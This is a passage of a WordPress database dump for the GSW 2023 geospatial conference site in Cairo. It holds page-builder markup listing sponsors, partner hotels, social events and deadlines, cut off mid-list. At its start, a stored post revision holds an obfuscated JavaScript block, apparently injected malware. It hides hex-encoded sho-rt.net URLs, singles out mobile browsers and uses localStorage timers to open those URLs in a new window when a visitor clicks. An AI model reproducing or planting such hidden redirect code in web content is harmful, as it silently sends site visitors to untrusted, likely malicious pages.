_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:53:07','2023-06-24 01:53:07','',3066,'https://gsw2023.com/?p=4811',0,'revision','',0),
(4812,1,'2023-06-24 01:53:32','2023-06-24 01:53:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 